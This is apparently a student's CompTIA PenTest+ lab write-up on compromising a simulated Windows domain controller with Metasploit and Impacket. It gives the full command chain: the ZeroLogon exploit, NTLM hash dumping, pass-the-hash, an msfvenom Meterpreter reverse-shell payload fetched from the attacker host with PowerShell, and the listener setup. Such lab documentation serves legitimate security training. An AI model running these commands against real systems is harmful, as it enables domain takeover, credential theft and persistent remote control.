This project was completed as part of my learning path toward the CompTIA PenTest+ certification.
The lab focused on using the Metasploit Framework (MSF) to discover, exploit, and maintain access to vulnerable systems within a simulated enterprise environment.
The exercises involved reconnaissance, remote exploitation, post-exploitation persistence, and payload delivery using Metasploit and Impacket tools.
To utilize Metasploit and complementary tools to:
- Discover active hosts and services on a target subnet.
- Perform vulnerability exploitation using Metasploit modules.
- Conduct credential extraction and pass-the-hash attacks with Impacket.
- Establish remote access and deposit a Meterpreter payload.
- Demonstrate post-exploitation persistence and command-and-control functionality.
- Using Metasploit Framework for reconnaissance, scanning, and exploitation.
- Conducting ZeroLogon (CVE-2020-1472) privilege escalation attacks.
- Utilizing Impacket for hash dumping and pass-the-hash exploitation.
- Creating and deploying Meterpreter reverse shells.
- Using msfvenom to generate payload executables.
- Managing sessions, handlers, and background processes within MSF.
- Understanding the workflow of multi-stage exploitation and remote persistence.
- Kali Linux VM (attacker system)
- Windows Server 2019 (DC10) (target system)
- Metasploit Framework (MSF)
- Impacket toolkit
- nmap for discovery and port scanning
- PostgreSQL (MSF database service)
- PowerShell (for remote file transfer)
- msfvenom for payload generation
- Started PostgreSQL and initialized MSF database:
systemctl start postgresql msfdb init msfconsole db_status - Performed subnet scan using nmap and imported results:
nmap 10.1.16.0/24 -F -A -oX targets.xml db_import targets.xml hosts - Removed local Kali IP from hosts table and confirmed with:
hosts -d 10.1.16.66 hosts - Performed additional port scans within MSF:
search portscan use auxiliary/scanner/portscan/syn set PORTS 10-100 hosts -R setg THREADS 3 run services
- Scanned SMB versions to identify Windows systems:
search smb version use auxiliary/scanner/smb/smb_version hosts -R run hosts - Discovered 10.1.16.1 (DC10) running Windows Server 2019 Standard, exposing LDAP and Kerberos ports.
- Queried LDAP to confirm domain:
search ldap query use auxiliary/gather/ldap_query set rhosts 10.1.16.1 run - Domain identified: structureality.local
- Located and used ZeroLogon exploit module:
search zerologon use auxiliary/admin/dcerpc/cve_2020_1472_zerologon set nbname dc10 set rhosts 10.1.16.1 exploit - Successfully reset the DC10 machine account password to null:
Successfully set the machine account (dc10$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)
- Dumped NTLM hashes using Impacket:
impacket-secretsdump -just-dc-ntlm structureality/dc10\$@10.1.16.1 - Identified domain and local account hashes, confirming Administrator hash:
aad3b435b51404eeaad3b435b51404ee:dae57d78fec919471799ce0fae8236b9 - Executed pass-the-hash attack for remote access:
impacket-psexec structureality/administrator@10.1.16.1 -hashes aad3b435b51404eeaad3b435b51404ee:dae57d78fec919471799ce0fae8236b9 - Gained remote command shell:
C:\Windows\system32> hostname → DC10
- Generated Meterpreter reverse shell payload using msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.1.16.66 LPORT=4567 -f exe -o secretfile.exe - Confirmed file size and launched temporary web server:
ls -l python3 -m http.server 8080 - From DC10 remote shell, downloaded payload:
powershell -Command "Invoke-WebRequest -Uri http://10.1.16.66:8080/secretfile.exe -OutFile secretfile.exe" dir secret* - Set up MSF listener:
msfconsole use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 10.1.16.66 set LPORT 4567 run - Executed payload on target:
secretfile.exe - Meterpreter session established:
→ Confirmed remote control over DC10
Meterpreter session 1 opened... meterpreter > background sessions sessions -i 1 sysinfo
- Attacker Role: Demonstrate exploitation and post-exploitation using Metasploit responsibly.
- Risks:
- Unintended damage to production systems if tests are not sandboxed.
- Legal and ethical violations if used without authorization.
- Persistence mechanisms could create backdoors.
- Mitigations:
- Conduct only in controlled, authorized lab environments.
- Document every action for audit and learning.
- Restore affected systems to original state after testing.
- Discovered & Enumerated: Hosts and services via nmap & MSF.
- Exploited Vulnerability: ZeroLogon (CVE-2020-1472) to gain DC10 access.
- Extracted Credentials: Domain hashes using Impacket.
- Gained Remote Shell: Through pass-the-hash attack.
- Established Meterpreter: Successful reverse TCP payload execution.
- Reinforced PenTest+ objectives:
- Perform network attacks using appropriate tools.
- Execute authentication and credential attacks.
- Use scripting and automation for attack execution.
- Move laterally and establish persistence.
This lab demonstrated full-cycle exploitation, from reconnaissance and privilege escalation to persistence using Meterpreter — a critical capability in the CompTIA PenTest+ certification journey.